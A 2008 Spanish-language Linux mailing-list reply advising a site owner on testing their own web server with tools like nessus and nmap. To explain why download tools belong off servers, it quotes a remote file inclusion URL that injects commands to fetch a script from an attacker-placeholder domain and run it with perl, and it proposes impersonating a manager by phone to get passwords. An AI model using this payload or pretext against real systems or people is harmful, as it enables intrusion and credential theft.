Ethical Hacking, aspectos a considerar.
Alberto Rivera
rivera.alberto en gmail.com
Vie Ene 18 17:34:22 CLST 2008
Asdtaker wrote:
> Estimados, alguien tiene idea de los aspecto de debiese considerar a la hora
> de realizar un escaneo de vulnerabilidades a mi sitio web?
>
> Por ahora considero estos ITEMs:
>
> - Ingenieria Social: informacion disponible en la web.
> - Archivos por defecto: todo aquello que viene con la instalacion en bruto
> del server web.
> - Extensiones por defecto: analizar el impacto de soportar distintas
> extensiones.
> - Sesiones: comprobar validez de sesiones, etc.
> - Manejo de errores: de aplicacion y servidor.
> - SQL Injection.
>
>
> Gracias por sus comentarios.
>
Mira toma nessus y lo corres desde el exterior y después desde el
interior de la organización esto te va a encontrar varias
vulnerabilidades y sus niveles de vulnerabilidad, luego tomas nmap y
tratar de insertar exploits conocidos a servicios conocidos desde dentro
y afuera cada vez, prueba varias herramientas en contra de tu sitio,
trata de explotarlo de forma controlada, o sea, no lo hagas cuando estén
todos trabajando ... esto te va a entregar una visión un poco más
específica de cualquier problemática que puedas tener. Ahora para el
desarrollo propiamente tal, prueba inyecciones de mysql, php y
vulnerabilidades de javascript o ajax o lo que tengas, para hacer
inyecciones de forma remota hay varias formas de hacerlo y están super
documentadas incluso en youtube puedes encontrar videos bastante buenos
... a nivel de servidor elimina cualquier software que sirva para bajar
cosas del internet para que no te puedan ejecutar ningún código dentro
de la máquina y para que imposibilites a los atacantes a hacer cosas
como esta :
http://tudominio/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=
1&GLOBALS=&mosConfig_absolute_path=http://dominiousadoporelatacante/directorioherramientas/tool25.txt?&cmd=cd%20/tmp;
wget%20http://dominiousadoporelatacante/directorioherramientas/spkat.txt;
curl%20-O%20http://dominiousadoporelatacante/directorioherramientas/spkat.txt;
lwp-download%20-a%20http://dominiousadoporelatacante/directorioherramientas/spkat.txt;
GET%20http://dominiousadoporelatacante/directorioherramientas/spkat.txt;
lynx%20-source%20http://dominiousadoporelatacante/directorioherramientas/spkat.txt;
links%20-source%20http://dominiousadoporelatacante/directorioherramientas/spkat.txt;
perl%20spkat.txt
si te fijas aquí el atacante no se fija ni en ingeniería social ni en
datos de ningún tipo sólo hace un ataque vía sitio web, y ve si tu sitio
tiene permiso de ejecutar cualquiera de las aplicaciones de descarga o
navegación, con esto baja un paquete, para el ejemplo spkat.txt y
después lo ejecuta con perl. El spkat lo que hace es abrir puertos,
levantar servicios, ejecutar troyanos dentro de la máquina o cualquier
cosa ....
Ahora lo de la ingeniera social es para cuestiones super puntuales por
ejemplo, para conseguir acceso a un sistema en red, por ejemplo llamas a
la secretaria de administración y le dices que eres el gerente de
operaciones y le pides un nombre de usuario y password del sistema, así
puedes ver realmente cual es el nivel de seguridad que cuentas de parte
de los usuarios ... pero la ing. social no es encontrar información en
internet.
eso, espero te sirva
salu2
>
>
>
>
>
Más información sobre la lista de distribución Linux